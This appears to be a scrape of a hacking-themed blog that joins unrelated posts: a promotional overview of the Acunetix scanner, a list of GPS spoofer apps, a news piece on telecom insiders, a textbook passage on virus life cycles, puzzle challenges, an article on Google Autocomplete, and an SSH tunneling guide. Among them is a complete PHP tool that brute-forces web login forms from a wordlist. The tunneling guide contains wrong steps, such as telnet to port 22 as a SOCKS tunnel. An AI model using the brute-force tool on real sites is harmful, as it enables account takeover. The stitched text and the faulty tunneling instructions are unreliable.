Acunetix – Web Vulnerability Scanner For Hackers

Acunetix is a web vulnerability scanner that you can use to detect vulnerabilities in the web applications. It can also be used to perform penetration testing against the detected issues. During scanning, Acunetix can analyze the source code and pinpoint the exact line of code with vulnerability.
It also provides mitigation suggestions for the vulnerabilities — you can use that to increase the security of the web app.
The scanner is super fast, it can crawl hundreds of thousands of pages in just few minutes.
Now let’s talk about the Tools…
  • Site Crawler: It collects referrer pages, headers, and variables within the pages. If the crawler is in the default mode, it will crawl the whole site but you can limit the extensions if you want.
  • Target Finder: It is a port scanner that can find websites running in a range of given addresses. The range of addresses is not limited and you can specify which ports to look on in order to discover websites on nonstandard ports. It can also identify the type of the target web server.
  • Subdomain Scanner: It can identify active sub domains of a top level domain very easily. It can be configured to use the target’s DNS server or any other DNS server specified by the user.
  • Blind SQL Injector: This is a powerful tool that can enumerate databases and tables, dump data and also read specific files on the file system of the web server if an exploitable SQL injection is discovered. It is an automated database data extraction tool, but it also allows you to run custom SQL “Select” queries against the database.
  • HTTP Editor: The HTTP Editor allows you to create, analyze, and edit client HTTP requests and server responses. It also contains an encoding and decoding tool to encode/decode text and URL’s to MD5 hashes, UTF7 formats and many other formats.
  • HTTP Sniffer: The HTTP Sniffer acts as a proxy and allows you to capture, examine and modify HTTP traffic between an HTTP client and a web server. You can also enable, add or edit traps to capture traffic before it is sent to the web server or back to the web client. It can help you analyze how Session IDs are stored and how inputs are sent to the server, and alter any HTTP requests being sent back to the server before they get sent. It also allows you to navigate through parts of the website which cannot be crawled automatically, and import the results into the scanner to include them in the automated scan.
  • HTTP Fuzzer: It enables you to launch a series of sophisticated fuzzing tests to audit the web application’s handling of invalid and unexpected random data. The HTTP Fuzzer also allows you to create input rules for further testing in Acunetix Web Vulnerability Scanner.
  • Authentication Tester: This is actually a dictionary attack tool that you can use to perform a dictionary attack against login pages that use both HTTP (NTLM v1, NTLM v2, digest) or form based authentication. This tool uses two predefined text files (dictionaries) containing a list of common usernames and passwords. You can add your own combinations to these text files if you want.
  • Web Services Scanner: It allows you to launch automated vulnerability scans against WSDL based Web Services.
  • Web Services Editor: This tool allows you to import an online or local WSDL for custom editing and execution of various web service operations over different port types for an indepth analysis of WSDL requests and responses. The editor also features syntax highlighting for all languages to easily edit SOAP headers and customize your own manual attacks.
Now let’s learn to use the app…

 

 

How To Use Acunetix

First download and install Acunetix Web Vulnerability Scanner on your computer.

(download link is at the end of this article)

Then open it, you will see a window as shown below.

Acunetix Web Vulnerability Scanner Window

Click on “New Scan“. A wizard window will appear.

Scan Type

Now enter the website address in the Website URL box. Then click on “Next >“.

Now select a scanning profile or you can leave it as default. Then click on the “Next >” button.

Then click on “Next >“.

Then configure the login details for password protected areas. If there no password required, then levae it as default and lcik on the “Next >” button.

It may show you additional hosts in the target website (see the above image), if you want to add those websites in the scan, then select those websites and click on “Finish“. Now the Acunetix should start scanning the target website. wait for completion…

If you want to know more about a vulnerability, and how to fix it, just click on the web alert.

Download LINK

10 Best Free GPS Spoofer Apps For Android

There are a lot of GPS spoofer apps in the Google Play Store. Unfortunately, many of them are fake and crappy. That’s why I’m writing this list-based article. I don’t want you to spend your hard-earned money on some crappy apps.
Let’s dive into the list.
Note: This list is not in any particular order.
Mock Locations
Mock Locations is a powerful android app that allows you to spoof the device location in seconds. It has several amazing features such as the ability to simulate GPS route, set breakpoints, set variable speed and simulate closed route.
It also allows you to hide the application icon from the status bar.
Google Play Rating: 4.1
Screenshots:

Mock Locations Screenshots

Download Mock Locations

Moving onto the next app…

Fake Location Spoofer Free

If you are looking for special features, this app is not for you. Fake Location Spoofer is actually a simple GPS spoofer app, it doesn’t have any special features like the above one.

Google Play Rating: 4.4

Screenshots:
 
Fake Location Spoofer Free Screenshots
Download Fake Location Spoofer Free

Next one on my list is…

Fake GPS - Fake Location

Take a look at the screenshots, the user interface is so clean and easy to use. It also has a bookmarking feature that allows you to save your favourite locations. No other special features are included in this app.

Google Play Rating: 4.2
Screenshots:

Moving onto the next app….

Fake GPS Location

It provides many features such as favourites, history, start on boot and random movement. The user interface is clean, and I personally like this app a lot.

Google Play Rating: 4.1
Screenshots:
 
Fake GPS Location Screenshots
Fake GPS App

I have mentioned this app before in an article titled “How To Fake Your GPS Location On Android“. Fake GPS app is just like the above one, but it doesn’t have the start on boot feature.

Google Play Rating: 4.3

Screenshots:
 
Fake GPS Screenshots
Download Fake GPS

Moving onto the next one…

Fake GPS Location App

Just another simple GPS spoofer app. It has no special feature other than the bookmarks.

Google Play Rating: 4.1

Screenshots:
Fake GPS Location Screenshots

Download Fake GPS Location

Next app on my list is…

Mock GPS Pro App

It is just like the above-mentioned app. You can see it in the screenshots.

Google Play Rating: 4.1

Screenshots:

Mock GPS Pro Screenshots

Download Mock GPS Pro

Next app is…

Location Spoofer App

Location Spoofer is a great tool to set a fake wireless networks location. It has features such as random movement and spoof duration.

Google Play Rating: 4.1

Screenshots:

Location Spoofer Screenshots

Download Location Spoofer

Moving onto the next app on the list…

Fake GPS Pro App

Fake GPS Pro is a simple tool to spoof your device location. It allows you to search a location by using the latitude and longitude.

Google Play Rating: 4.0

Screenshots:

Fake GPS Pro Screenshots

Download Fake GPS Pro

And…the last app on my list is…

Location Mockup - Fake & Share App

The user interface of this app is different from other GPS spoofer applications. It allows you to search a location by using the name or the latitude and longitude.

Google Play Rating: 3.8

Screenshots:

Your internet provider been compromised? Malicious insiders are helping cybercriminals hack telecoms firms

Be they disaffected insiders or victims of blackmail, staff at telecommunications firms are providing cybercriminals with the information required to carry out cyberattacks against their employers

 

With the sector a top target for hackers — as demonstrated by last year’s TalkTalk hack — Kapersky Lab’s Threat Intelligence Report for the Telecommunications Industry warns telecoms providers that they need to do more to protect themselves from cyber threats, from both outside and inside their networks.

According to the report, 28 percent of all cyberattacks and 38 percent of all targeted attacks involve malicious activity by company insiders — although not everyone involved in passing corporate credentials and other inside information to hackers are willing participants in the criminal schemes.

One tactic used by hackers is to find compromising information on an employee — be it available on the open internet or from a previous cache of stolen data — at the organisation they wish to target.

Hackers will then blackmail the person, forcing them to hand over information which will compromise their employer or distribute spear phishing emails on their behalf, in order for the potentially embarrassing personal data not to come to light.

The report suggests that cybercriminals may have used data exposed following the hack of Ashley Madison, a dating website catering to adulterers, in order to blackmail workers.

However, Kaspersky warns that not all insider attacks are carried out by reluctant participants: some are done with the help of willing insiders who are more than happy to put their telecoms employer — and therefore their customers — at risk from cybercriminals.

More often than not, these malicious insiders will offer their services on underground message boards on the dark web, or via ‘black recruiters’, and are paid for their services. Researchers warn that these malicious insiders also have no qualms about identifying co-workers who could potentially be blackmailed.

Another example saw an SMS centre support engineer spotted on a popular dark web forum advertising their ability to intercept messages containing the one-time passwords used for the two-step authentication process required to login to customer accounts at a popular fintech company.

For the cybercriminals, recruiting an insider makes hacking a company a much simpler task, providing them with easy access to internal networks and data. The report notes how insiders at phone companies are mostly recruited to provide access to data, while staff at internet service providers are more often used to help carry out man-in-the-middle attacks.

“The human factor is often the weakest link in corporate IT security. Technology alone is rarely enough to completely protect the organisation in a world where attackers don’t hesitate to exploit insider vulnerability. Companies can start by looking at themselves the way an attacker would,” says Denis Gorchakov, senior information security analyst at Kaspersky Lab.

“If vacancies carrying your company name, or some of your data, start appearing on underground message boards, then somebody, somewhere has you in their sights. And the sooner you know about it the better you can prepare,” he adds.

MODULE 7.1 The Life and Times of a Virus

Simply put, a virus is a self-replicating application that attaches itself to other executable programs. Many viruses affect the host as soon as they are executed; others lie in wait, dormant, until a predetermined event or time, before carrying out their instructions. What does the virus do then? Many potential actions can take place, such as these:

  • Altering data
  • Infecting other programs
  • Replicating
  • Encrypting itself
  • Transforming itself into another form
  • Altering configuration settings
  • Destroying data
  • Corrupting or destroying hardware

The process of developing a virus is very methodical. The author is concerned with creating an effective virus that can be spread easily. The process occurs in six steps:

  1.  Design—The author envisions and creates the virus. The author may choose to create the virus completely from scratch or use one of the many construction kits that are available to create the virus of their choice.
  2. Replication—Once deployed, the new virus spreads through replication: multiplying and then ultimately spreading to different systems. How this process takes place depends on the author’s original intent, but the process can be very rapid, with new systems becoming infected in short order.
  3. Launch—The virus starts to do its dirty work by carrying out the task for which it was created (such as destroying data or changing a system’s settings). Once the virus activates through a user action or other predetermined action, the infection begins.
  4. Detection—The virus is recognized as such after infecting systems for some period of time. During this phase, the nature of the infection is typically reported to antivirus makers, who begin their initial research into how the software works and how to eradicate it.
  5. Incorporation—The antivirus makers determine a way to identify the virus and incorporate the process into their products through updates. Typically, the newly identified malware is incorporated into signature files, which are downloaded and installed by the antivirus application.
  6. Termination—Users of the antivirus products incorporate the updates into their systems and eliminate the virus.

It is important to realize that this process is not linear: It is a loop or cycle. When step 6 is reached, the whole process starts over at step 1 with another round of virus development.

String Manipulation Challenge – Difficulty (Medium)

 

This level is about string manipulation.
In this challenge, you will be given a string. Take all the numbers from the string and classify them as composite numbers or prime numbers. You should assume all numbers are one digit, and neither number 1 nor number 0 counts. Find the sum of every composite number, then find the sum of every prime number. Multiply these sums together. Then, take the first 25 non-numeric characters of the given string and increment their ASCII value by one (for example, # becomes $). Take these 25 characters and concatenate the product to them. This is your answer.
Your answer should look like this: oc{lujxdpb%jvqrt{luruudtx140224

 

 

 

6xcyna#r3jtl33gjgdq0oi#dz1ju$ww9i@#nyrz44jcj6dii7vh87f$6rjidebauux$9g467wwq28k9cv2oc@qtpvpi?94rgh4dlnncf2jj76jofmmv7xssqlnfysv9dndbnjlgfobaqldy#jhbep8gtf?bxcpdptbepjm05ouu83b0#vv5bt$@myh4w7vw0jd5g5jkmwvyl#u7e7ke7vyfdbxy5z@7qthl#nom9e?dcks#4y7auc10$jhyo41wrli9czmnknp154j0rgooxfigyvud2ro15#90vatic4wnyr2xhj1?2rv47#6rn3lubxcact$j#vvrhrrfjweg86ps3e#fk07wbfufbg3e8ewydjcocz7oc3$8bv4@j78#0rl7n4uf3cbyrc37o8hq3oe4btri0zivwum4ft0$nw3d#9hk9qiqgj7x#0vxiine15vsxqkh1kuk4w33fi0jymnc4z00rv0m1f$5@nl$noxj4w2?m579tln97d46w$gai29gfynldo16rv4g@vdjdunubuo$3j20e13m@5wc5584#t40pv4?a14$eg?1#?cttvnk#0yh?1ou7301?uby1b77fiyitu$inzgyix1a@#zp#y021nd?eu0k1wt$i#rtw

 

Fix a corrupted file – Challenge 2 (Amateur)

This level is about a corrupted file.

Someone, using the windows command line ftp client, downloaded a bz2 compressed png-file which contained an important password.
But he forgot something to take into consideration, and so the file got corrupted.
Get this file  HERE , reconstruct it and send the password as answer.

 

Submit Your Answers Below

Everything You Need To Know About Google Autocomplete Suggestions

It’s a well known feature of Google. Start typing in a search, and Google offers suggestions before you’ve even finished typing. But how does Google come up with those suggestions? When does Google remove some suggestions? When does Google decide not to interfere? Come along for some answers.

Google & Search Suggestions

Google was not the first search engine to offer search suggestions, nor it is the only one. But being the most popular search engine has caused many to look at Google’s suggestions more closely.

Google has been offering “Google Suggest” or “Autocomplete” on the Google web site since 2008(and as an experimental feature back since 2004). So suggestions — or “predictions” as Google calls them — aren’t new.

What Google suggests for searches gained new attention after Google Instant Search was launched last year. Google Instant is a feature that automatically loads results and changes those results. That interactivity caused many to take a second look at suggestions, including an attempt to list allblocked suggestions.

Suggestions Based On Real Searches

The suggestions that Google offers all come from how people actually search. For example, type in the word “coupons,” and Google suggests:

  • coupons for walmart
  • coupons online
  • coupons for target
  • coupons for knotts scary farm

These are all real searches that have been done by other people. Popularity is a factor in what Google shows. If lots of people who start typing in “coupons” then go on to type “coupons for walmart,” that can help make “coupons for walmart” appear as a suggestion.

Google says other factors are also used to determine what to show beyond popularity. However, anything that’s suggested comes from real search activity by Google users, the company says.

Suggestions Can Vary By Region & Language

Not everyone sees the same suggestions. For example, above in the list is “coupons for knotts scary farm.” I see that, because I live near the Knott’s Berry Farm amusement park in Orange County, California, which holds a popular “Knott’s Scary Farm” event each year.

If I manually change my location to tell Google that I’m in Des Moines, Iowa, that particular suggestion goes away and is replaced by “coupons for best buy.”

Similarly, if I go to Google UK, I get suggestions like:

  • coupons uk
  • coupons and vouchers
  • coupons for tesco

Tesco is a major UK supermarket chain, just one reflection of how localized those suggestions are.

This is also why something like the Google Instant Alphabet or The United States of Autocomplete(shown below) — while clever — aren’t accurate and never can be, unless you’re talking about the suggestions shown in a particular region.

In short, location is important. The country you’re in, the state or province, even the city, all can produce different suggestions.

Language also has an impact. Different suggestions will appear if you’ve told Google that you prefer to search in a particular language, or based on the language Google assumes you use, as determined by your browser’s settings.

Previously Searched Suggestions

Google’s suggestions may also contain things you’ve searched for before, if you make use ofGoogle’s web history feature.

For example, when I search for “rollerblade,” my suggestions look like this:

  • rollerblade parts
  • Rollerblade 2009 Speedmachine 110
  • rollerblades
  • rollerblade wheels
  • rollerblade

The first two come from my search history. That’s why they have the little “Remove” option next to them.

Personalized suggestion like these have been offered since May 2009. The only change with Google Instant was that they were made to look different, shown in purple similar to how links look at some web sites, to indicate if you’ve clicked on them before.

How Suggestions Are Ranked

How are the suggestions shown ranked? Are the more popular searches listed above others? No.

Popularity is a factor, but some less popular searches might be shown above more popular ones, if Google deems them more relevant, the company says. Personalized searches will always come before others.

Deduplicating & Spelling Corrections

There a small degree of deduplicating and spelling correction that happens in the final suggestions that show, Google says.

For example, if some people are typing in “LadyGaga” as a single word, all those searches still influence “Lady Gaga” being suggested — and suggested as two words.

Similarly, words that should have punctuation can get consolidated. Type “ben and je…” and it will be “ben and jerry’s” that gets suggested, even if many people leave off the apostrophe.

Freshness Matters

Google Autocomplete also has what the company calls a “freshness layer.” If there are terms that suddenly spike in popularity in the short term, these can appear as suggestions, even if they haven’t gained long-term popularity.

A good example of this was when actress Anna Paquin was married. “Anna Paquin wedding” started appearing as a suggestion just before her big day, Google says. That was useful to suggest, because many people were starting to search for that.

If Google had relied solely on long-term data, then the suggestion wouldn’t have made it. And today, it no longer appears, as it didn’t maintain long-term popularity (though “anna paquin married” has stuck).

How short-term is short-term? Google won’t get into specifics. But suggestions have been spotted appearing within hours after some search trend has taken off.

Why & How Suggestions Get Removed

As I said earlier, Google’s predictions have been offered for years, but when they were coupled with Google Instant, that sparked a renewed interest in what was suggested and what wasn’t. Were things being removed?

Yes, and for these specific reasons, Google says:

  • Hate or violence related suggestions
  • Personally identifiable information in suggestions
  • Porn & adult-content related suggestions
  • Legally mandated removals
  • Piracy-related suggestions

Automated filters may be used to block any suggestion that’s against Google’s policies and guidelines from appearing, the company says. For example, the filters work to keep things that seem like phone numbers and social security numbers from showing up.

Since the filters aren’t perfect, some suggestions may get kicked over for a human review, Google says.

Hate Speech & Protected Groups

In terms of blocking hate and violence suggestions, it’s not that everything possibly hateful gets blocked as a suggestion.

For example, “i hate my mom” and “i hate my dad” are both suggestions that come up if you type in “i hate my.” Similarly, “hate gl” brings up both “hate glee” and “hate glenn beck.”

Instead, hate suggestions are removed if they are against a “protected” group. So what’s a protected group?

Google doesn’t actually define this on its Autocomplete help page. However, a Google AdWords help page has a rundown on what Google’s long-considered to be protected groups:

  • race or ethnic origin
  • color
  • national origin
  • religion
  • disability
  • sex
  • age
  • veteran status
  • sexual orientation or gender identity

Even “majority” groups such as whites get covered by this, under the “color” category. That seems to be why “i hate white” doesn’t prompt a suggestion for “i hate whites,” just as “i hate black” doesn’t suggest “i hate blacks.”

However, in both cases, other hate references do get through (“i hate white girls” and “i hate black girls” both appear). This is where a human review may happen, if the reference is noticed.

Legal Cases & Removals

Google blocks some suggestions for legal reasons. For example, last year, Google lost two cases in France involving Google Autocomplete.

In the first, Google was ordered to remove the word “arnaque” — which means scam — from coming up as a suggestion for when someone typed in the name of a distance learning company.

Google appears to have done this, when I checked today. Google would not say if it is appealing the case or whether this applies to preventing the word “arnaque” from appearing next to any company’s name.

From some limited testing, I think Google is preventing from “arnaque” from appearing after any company name but not before (“arnaque paypay” and “arnaque groupon” are suggestions).

In the second French autocomplete case, a plantiff — whose conviction was on appeal — sued and won a symbolic 1 euro payment in damages over having the words “rapist” and “satanist” appearing next to his name.

The plantiff’s name wasn’t given in the case, so I can’t check that the terms were removed as ordered. Last year, Google said it would appeal the ruling. The company gave me no update on things when I asked for this article. It doesn’t seem likely that this has caused Google to drop having such terms appear next to the names of other people.

Yesterday, news broke about Google losing a case in Italy involving suggestions. Here, a man sued over having the Italian words for conman and fraud appearing next to his name.

I can’t check if Google has complied with the ruling, because the man’s name was never given — nor does his lawyer make clear if Google has complied. It’s also unclear if this ruling is causing such terms to be dropped in relation to anyone’s name (this seems unlikely).

I asked Google about this but was only given a standard statement:

We are disappointed with the decision from the Court of Milan.  We believe that Google should not be held liable for terms that appear in Autocomplete as these are predicted by computer algorithms based on searches from previous users, not by Google itself.  We are currently reviewing our options.

 

Controversial Cases

Aside from legal cases, Google’s suggestions have occasionally become news controversies. Typically, Google responds to these with a standard answer, which goes like this: the predictions are based on how people search, not by any particular “agenda” that the company is trying to push.

Google tells me it doesn’t typically comment more in these cases, because it doesn’t want to be in the position of having to issue a detailed response for any oddity that someone spots. Still, Google did open up about two examples of strange suggestions that have come up in the past.

One involved the suggestion “climategate,” which oddly disappeared shortly after appearing. My Climategate: Just How Popular Is It, According To Google? story from December 2009 has more about this.

Blame that aforementioned freshness layer, says Google. Back when this all happened, the freshness layer had a gap that allowed spiking queries to appear for a short period of time, then disappear unless they gained more long term popularity.

That gap has since been reduced. Spiking queries stay around longer, then drop unless they gain long-term traction. The “climategate” suggestion didn’t catch on and so disappeared. It wasn’t manually removed, as some assumed, Google said.

Interestingly, looking today, “climategate” still hasn’t gained enough long term popularity to come up as a suggestion at Google. But over at Bing — which, of course, uses its own unique suggestion system — it is offered.

In another case, a search for “islam is” was producing no suggestions while searches for other religions were — including negative ones. Our Islam Is … Blocked By ‘Bug’ In Google Suggest story from January 2010 has more about this.

As it turned out, there was a human error involved, Google told me.

Those suggestions had been escalated for human review as possibly being hate-related. A block was placed, because someone assumed that Islam as a religion met the protected group criteria.

But in fact, Google Autocomplete does not consider religions to be protected groups (I’ll get back to this). So other religions didn’t have a filter established for them.

Today, “islam is” brings back some negative suggestions, just as is the case with other religions.

Nationalities Briefly Protected; Religions Not

Feeling confused about who get protected, at this point? So am I.

Remember when I listed what a protected group was, according to Google, above? That included religions, but that’s the definition that Google AdWords uses, not Google Autocomplete.

Similarly, Google’s YouTube has its own definition of protected groups:

Protected groups include race or ethnic origin, religion, disability, gender, age, veteran status, and sexual orientation/gender identity.

National origin isn’t on that list. Indeed, it wasn’t on the unpublished list that Google Autocomplete uses until last May, when Google began to filter suggestions related to nationality. Search for “americans are,” for example, and you got nothing.

To me, it’s kind of crazy. Why protect nationalities but not religions? And why wouldn’t suggestions like “jews are cheap” or “jews are racist” be considered against a protected group, in terms of a race or ethnic group?

Google gave me this statement on the topic (the brackets aren’t me removing words but instead how Google indicates a search term):

Simply put, nationalities refer to individuals, religions do not. Our hate policy is designed to remove content aimed at specific groups of individuals. So [islamics are] and [jews are] or [whites are] would possibly be filtered, while queries such as [islam is] and [judaism is] would not because the suggestions are directed at other entities, not people.

Sorry, I’m not convinced by this. Worse, when I did some double-checking today, the previously established nationality filter — which the statement defends — appears to be turned off. Yes, Americans are again fat, lazy and ignorant, as Google’s “predictions” suggest, and the French are lazy cowards.

Can You Request Removals?

As you can imagine, some people would like to have negative suggestions removed. However, as explained, Google only does this in very specific instances. The company doesn’t even have a form to request this (though there is a help page on the topic, that suggests leaving comments in Google’s support forums).

Should businesses be allowed to request removal of suggestions? It’s not something that Google wants to arbitrate. Jonathan Effrat, a product manager at Google who works on Google Instant, told me:

Unfortunately, we won’t do a removal in those situations. A lot of times people are searching for it, and there’s a legitimate reason. I had a friend who used to work for a company, and the company name plus “sucks” was a suggestion, and that was the reality. It’s not really our place to say you shouldn’t be searching for that.

There are signs that Google has been pulling back by suggesting “scam” along with company names, but despite these reports, you can still find examples where this still happens. Google hasn’t commented if it’s actually made any change like this, by the way.

What About Piracy?

Of course, Google recently did decide that people shouldn’t be searching for things, in the case of online piracy, when it began blocking terms it deemed to be piracy-related in January.

That took out — and continues to take out — suggestions for some sites that may also be used for legitimate reasons. To be clear, suggestions were removed, not the sites themselves.

Want to read the Wikileaks files directly? BitTorrent or uTorrent have software that will allow you to do this. But today, Google won’t auto-suggest their names as you begin to type, deeming them too piracy related.

Aside from taking out some potentially innocent parties, the whole thing feels kind of hypocritical. Why does Google feel it needs to go over-and-above to protect searchers piracy-related suggestions when there are a range of other potential harmful ones out there?

The answer, in my view, is that this is a PR battle Google wants to win as studios and networks accuse it of supporting piracy and seek to enlist the aid of the US Congress. Dropping piracy suggestions is an easy gift, especially when Google’s not proactively removing the real issue, sites that host pirated content in its own results. It’s also a gift that might help it get network blocking of Google TV lifted.

And Fake Queries?

Meanwhile, another issue has gained fresh attention — the ability for people to “manufacture” suggestions. In particular, Amazon’s Mechanical Turk is a well-known venue where people can request that others do searches. When enough searches happen, then suggestions start appearing.

Brent Payne is probably one of the most notable examples of someone deliberately doing this “above the radar,” so to speak. He ran a series of experiments where he hired people on Mechanical Turk to do searches, which (until Google removed them) caused suggestions to appear:

Tempted to try it? Aside from potentially violating Mechanical Turk’s terms, Google says doing so is something it deems spam and will take corrective action against, if spotted.

What action? So far, that seems to be limited to removing the manufactured suggestions.

Postscript: Payne’s study has apparently gone away, but another study done in March 2012 showed that using Mechanical Turk can still have an impact.

A Suggestion For Google’s Suggestions

As I said, Google Instant prompted renewed attention about Google’s suggestions — along with debate about whether Google should be offering suggestions at all, given the reputation nightmare they can bring to some companies and individuals, as well as offense they bring to other groups. On the flipside, there’s the usefulness of them.

Here’s a case that illustrates the balancing act. Last year, a skydiving company contacted me, concerned that searches for its name brought up a suggestion of its name plus the words “death” or “accident.” Yes, the company had someone who died in a jump.

That’s something harmful to the company, even if true. Skydiving is by its nature an extremely dangerous sport, and the suggestion gives no guidance about whether the company was somehow at fault. It just immediately suggests there’s something wrong with the company.

However, it’s also incredibly useful for searchers, as a way for them to refine their queries in ways they might not expect.

Still, I think the balancing act should tip back toward not offering up anything negative about any person, company or group. No nonsense about “protected groups.” Just kill the negative suggestions, period.

This is a suggestion for all the major search engines, by the way. Enough singling out Google, when these types of examples can be found easily on Bing and Yahoo, also.

If there are negative things that people want to discover about a person, company or group, those will come out in the search results themselves, and mixed in with more context overall — good, bad or perhaps indifferent.

Yes, many Americans know they’re stereotypically seen as fat. Other nationalities and religious groups also know that there are many hurtful stereotypes about them. But who wants Google seeming to tell them that?

Yes, Google’s correct in saying that the suggestions it shows reflect what many people are searching for — and thus think.

Still, parroting harmful thoughts “searched” by others doesn’t make those things any less hurtful or harmful. And by repeating these things, there’s an argument that search engines simply makes the situation worse.

Simple HTTP-Login Dictionary attack = PHP CODE

<html>
  <head>
    <title> PRO HACKER </title>	
  </head>
<body>
 
<FORM action=\"<?php echo $_SERVER[\'PHP_SELF\']; ?>\" method=\"POST\">
LINK:                                    Examples:<br />
<input type=\"text\" name=\"link\">         \"http://site.com/index.php\" \"http://192.168.1.100/index.php<br />
          <br />
FORM USERNAME FIELD: 			<br />
<input type=\"text\" name=\"fuser\">        \"username\" \"users\" \"anv\" \"user_login\"<br />
 
FORM PASSWORD FIELD: 			<br />
<input type=\"text\" name=\"fpass\">        \"password\" \"pass\" \"password_login\"<br />
 
OPTIONAL POSTDATA: 			<br />
<input type=\"text\" name=\"pdata\">        \"submit=send\" \"login=true\"<br />
          <br />
USERNAME: 				<br />
<input type=\"text\" name=\"username\">     \"Admin\" \"Heaton\" \"Mario\"<br />
 
CORRECT LOGIN VALUE:			<br />
<input type=\"text\" name=\"correct\">      \"Welcome Admin\" \"You have logged in\"<br />
 
DICTIONARY FILENAME:			<br />
<input type=\"file\" name=\"userfile\" >    \"/root/wordlist\" \"c:\\wordlist.txt\"<br />
 
<input type=\"submit\" value=\"ATTAAACK!\" name =\"submit\">
</form>
 
 
<?php
 
function get_url_contents($url,$fuser,$username,$fpass,$password,$pdata)
{
        $crl = curl_init();
        $timeout = 5;
        curl_setopt ($crl, CURLOPT_URL,$url);
 
  curl_setopt ($crl, CURLOPT_POSTFIELDS,
            $fuser 
            . \"=\" 
            . $username 
            . \"&\" 
            . $fpass 
            . \"=\" 
            . $password  
            . \"&\"
            . $pdata
            );
 
  curl_setopt ($crl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($crl, CURLOPT_CONNECTTIMEOUT, $timeout);
        $ret = curl_exec($crl);
        curl_close($crl);
        return $ret;
}
 
if(isset($_POST[\'submit\']))
  {
  $link		= 	$_POST[\"link\"];
  $fuser	 	= 	$_POST[\"fuser\"];
  $fpass 		= 	$_POST[\"fpass\"];
  $pdata 		= 	$_POST[\"pdata\"];
  $username 	= 	$_POST[\"username\"];
  $correct 	= 	$_POST[\"correct\"];
  $userfile 	= 	$_POST[\"userfile\"];
 
  echo	\"<br />Link: \"		.	$link;
  echo	\"<br />Fuser: \"		.	$fuser;
  echo	\"<br />Fpass: \"		.	$fpass;
  echo	\"<br />Pdata: \"		.	$pdata;
  echo	\"<br />Correct string: \".	$correct;
  echo	\"<br />User: \"		.	$username;
  echo	\"<br />Filename: \"	.	$userfile;
 
 
 
  $fp = fopen($userfile,\'r\') or die (\"Can\'t open wordlist-file!\");
  $x = 0;
      while(! feof($fp))
      {
        $password = fgets($fp); 
        $password = rtrim($password);
        $site = get_url_contents($link,$fuser,$username,$fpass,$password,$pdata);
 
        $pos = strpos($site, $correct);
        $x++;
 
          if($pos === FALSE) 
          {
 
          }
          else 
          {
   				echo \"<br /><br /><br />\";
          echo \"SUCCESS<br />\";
          echo \"Found a valid login! <br />\";
          echo \"Username: \" . $username . \"<br />\";
   				echo \"Password: \" . $password . \"<br /><br />\";
          echo \"Position in wordlist file: \" . $x;
          fclose($fp);
          break;
          }
 
        if(feof($fp))
        echo\"<br />Password was not found!\";
      }
}
 
?>	
</body>
</html>


 

SSH tunneling basics

TABLE OF CONTENTS

A. SSH
.Telnet
.Putty

B. Tunneling Explanation
C. SSH Tunneling
.Telnet
.Putty

A. SSH
.TELNET

\”Telnet is a user command using TCP/IP protocols to access a computer remotely. To have access to that computer, you must have permission, meaning you must authenticate to the system with a valid username and password. When you are connected to the network using telnet, you can enter commands and they will be executed as if the were being entered directly onto the server console.\” – www.greencomputer.com/solutions/glossary.html

Telnet in short, is used to connect to a remote computer and interact with it. Telnet can be used for many reasons, terminal based SMTP servers, terminal based FTP servers, terminal based HTTP servers (sorta like the old BBS boards).

.Putty

\”PuTTY is an SSH, Telnet, rlogin, and raw TCP client. It was originally available only for Windows, but is now also available on various Unix platforms, with work-in-progress ports to Classic Mac OS and Mac OS X. Other people have contributed unofficial ports to other platforms. It is written and maintained primarily by Simon Tatham, and is open source, licensed under the MIT license.\” – en.wikipedia.org/wiki/PuTTY

Sumarized, putty is used alot like telnet but less buggy and much more user friendly. It also comes with a GUI to help out those who do not want to launch commands via the command prompt (such as \”putty -ssh …..\”)

B. Tunneling Explanation

Tunneling is used to do 3 things.
1) Avoid web filters.
2) Avoid sniffers on a untrusted network.
3) Getting to a trusted internet source at airports, hotels, starbucks, and other places with hotspots. (Yes, this can also be used to gain free internet at places like this, but that is illegal and I dont recommend doing so. Getting arrested over stealing some internet at a cafe is just plain stupid.)

Tunneling is basicly just creating a \”tunnel\” between you and a trusted computer.

Example:
NOT TUNNELED:
Untrusted network -> You -> Website
SNIFFER WOULD PICK UP THE PACKETS AND PASSWORDS CLEARLY.

Untrusted network -> You -ENCRYPTED> Trusted computer -> Website
SNIFFERS WOULD EIGTHER NOT PICK UP THE PACKETS, OR GET THEM ENCRYPTED.

So your only using the internet of the untrusted network to connect to the trusted computer via SSH. The trusted computer is then the one who browses and sends back data, its used like a SOCKS proxy.

C. SSH Tunneling
.TELNET

To do SSH tunneling via telnet you must forward any port not being used by another application. Then open CMD and type:
telnet TRUSTED_COMPUTER_IP 22

this will connect to the trusted computer on port 22 (ssh).
login if prompted.

Now run firefox and click Tools>>Options.
Then click Connection Settings.
Now tick Manual Proxy Configuration.
Leave HTTP/SSL/FTP/Gopher proxy\’s blank and fill in the SOCKS Host boxes.
The first box is localhost (or 127.0.0.1)
The port is whatever port you forwarded.
Now just click ok and click ok again at the main options screen.
Now try surfing to google or something and it should now be surfing under the IP of the trusted computer. (go to www.whatismyip.com to see the trusted computer IP instead of urs).

.Putty

Run putty.
Click Connection->SSH then click on Tunnels.
Now on the box that sais Source Port fill in the port to be forwarded.
Then tick Dynamic.
Then click the ADD button.
You should now see something like \”D#\” where # is the port you forwarded.

Now click Session at the right.

Under the box that sais Host Name (or IP adress) enter the trusted computers host name or IP.

Under port put 22 (ssh).

Set protocol to SSH.

OPTIONAL: if you do not want to go thru this again, under the text that sais Saved Sessions type anything you want and hit save, next time you wish to tunnel just click it in the list one time and hit load.

Now click open.
login if prompted.

Now run firefox and click Tools>>Options.
Then click Connection Settings.
Now tick Manual Proxy Configuration.
Leave HTTP/SSL/FTP/Gopher proxy\’s blank and fill in the SOCKS Host boxes.
The first box is localhost (or 127.0.0.1)
The port is whatever port you forwarded.
Now just click ok and click ok again at the main options screen.
Now try surfing to google or something and it should now be surfing under the IP of the trusted computer. (go to www.whatismyip.com to see the trusted computer IP instead of urs).